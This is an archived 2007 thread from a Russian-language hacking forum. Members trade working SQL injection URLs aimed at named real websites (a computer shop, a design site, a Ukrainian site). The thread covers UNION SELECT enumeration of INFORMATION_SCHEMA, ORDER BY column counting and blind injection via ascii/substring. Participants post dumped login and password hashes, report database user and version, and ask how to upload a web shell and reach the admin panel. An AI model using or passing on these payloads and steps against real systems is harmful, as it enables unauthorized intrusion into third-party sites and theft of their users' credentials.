ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
20.04.2007, 21:39
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
http://www.nix.ru/dealers/howtofindus.html?key=o'%20UNION%20SELECT%20TABLE_N AME,2,3,4,5,6,7,8,9,10,11%20FROM%20INFORMATION_SCH EMA.TABLES%20LIMIT%20100,1/*
остановился на limit 100
|
|
|
20.04.2007, 22:16
|
|
Участник форума
Регистрация: 08.11.2006
Сообщений: 208
Провел на форуме:
1038169
Репутация:
184
|
|
да это то я отловил все... как вот шелл залить...
вот логины\пассы, от чего хз, и логины странные =) что за алогиритм - хз... и почему при попытке прочитать файло не выводиться ничего, точнее тот параметр.
нужно к админке доступ..
http://www.nix.ru/phpinfo.html вот еще нарыл.
login HIOIECOCLNFJOBGOOBHJJFBHPIMPLMMP
pass JIGHLICMEPANCNLICEMODLCADJCLLKKD
EOBHCLLINHPHPKNOHFFMIBHLANBJENKJ
EDOCHAAPELELOGGHCEEKFLEFEDAFNGBB
MBNPFBPOLIBIKANLOEDAOOGBHOEHFFOB
LNBIFIBPKLHODLJHCNKHAJOMGKPCNLOB
FGNPJCJEOOIJHEIOENPAFLMCIBCOOLLP
OABNALOFIAIJEAPPAAGMMEOFOAGGBLHE
|
|
|
|
20.04.2007, 22:19
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
load_file
into out file
не работает шелл средсвами mysql не зальешь.
PS читай название темы.
|
|
|
|
21.04.2007, 00:15
|
|
Новичок
Регистрация: 20.04.2007
Сообщений: 8
Провел на форуме:
4667
Репутация:
0
|
|
Честно вам сказать я выпал от двига! Там он дырявый до ужаса! Как такое можно в качестве магазина мутить?
Последний раз редактировалось R®.L@mer; 21.04.2007 в 00:59..
|
|
|
|
21.04.2007, 01:02
|
|
Новичок
Регистрация: 20.04.2007
Сообщений: 8
Провел на форуме:
4667
Репутация:
0
|
|
http://rudtp.ru/icc.php?id=1'
Скл явно есть! Столбцов 7 но какая-то трабла когда выборку делаешь!
http://rudtp.ru/icc.php?id=-1+union+select+1,2,3,4,5,6,7/*
Непойму че там!
|
|
|
|
21.04.2007, 15:45
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
http://www.elsa.com.ua/ru/index.php?page=13&curid=-1%20union+select+1,2,3,4,5,6,concat_ws(char(124,12 4),user(),database(),version()),8/*
Можно че то вытащить(ну в смысле логин:пасс )?
|
|
|
|
21.04.2007, 15:59
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от R®.L@mer
Столбцов 7
Извини за офттоп, но с чего ты взял что там 7 столбцов?
Поставь 6,5...1 все равно возвращает:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /space/home/svlasov/rudtp/icc.php on line 81
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /space/home/svlasov/rudtp/icc.php on line 82
Если тебе несложно, объясни мне, на основании чего ты рещил что их 7?
|
|
|
|
21.04.2007, 16:22
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от AkyHa_MaTaTa
Извини за офттоп, но с чего ты взял что там 7 столбцов?
Поставь 6,5...1 все равно возвращает:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /space/home/svlasov/rudtp/icc.php on line 81
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /space/home/svlasov/rudtp/icc.php on line 82
Если тебе несложно, объясни мне, на основании чего ты рещил что их 7?
http://rudtp.ru/icc.php?id=-1+order+by+8/*
http://rudtp.ru/icc.php?id=-1+order+by+7/*
обычно кол-во столбцов проверяется через order+by+xx где xx - заданное число (кол-во столбцов).
Последний раз редактировалось n1†R0x; 21.04.2007 в 16:26..
|
|
|
|
22.04.2007, 17:27
|
|
Новичок
Регистрация: 21.04.2007
Сообщений: 11
Провел на форуме:
50860
Репутация:
3
|
|
Сообщение от AkyHa_MaTaTa
Извини за офттоп, но с чего ты взял что там 7 столбцов?
Поставь 6,5...1 все равно возвращает:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /space/home/svlasov/rudtp/icc.php on line 81
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /space/home/svlasov/rudtp/icc.php on line 82
Если тебе несложно, объясни мне, на основании чего ты рещил что их 7?
Как сказал уже Нитрокс
http://rudtp.ru/icc.php?id=-1+order+by+8/* - ошибка
http://rudtp.ru/icc.php?id=-1+order+by+7/* - нет ошибки
Значит и столбцов 7
Я думаю, что там может фильтроватся union из запроса! Маловероятно но все же!
Последний раз редактировалось mr.crown; 22.04.2007 в 17:30..
|
|
|
|
22.04.2007, 17:42
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Все гараздо проще...
version()
3.23.49a
http://rudtp.ru/icc.php?id=2/**/AND/**/ascii(lower(substring(Version(),1,1)))=51/*
Эх что ж ленивые такие (((
user()
rudtp@localhost
database()
rudtp
Последний раз редактировалось [ cash ]; 24.04.2007 в 14:30..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
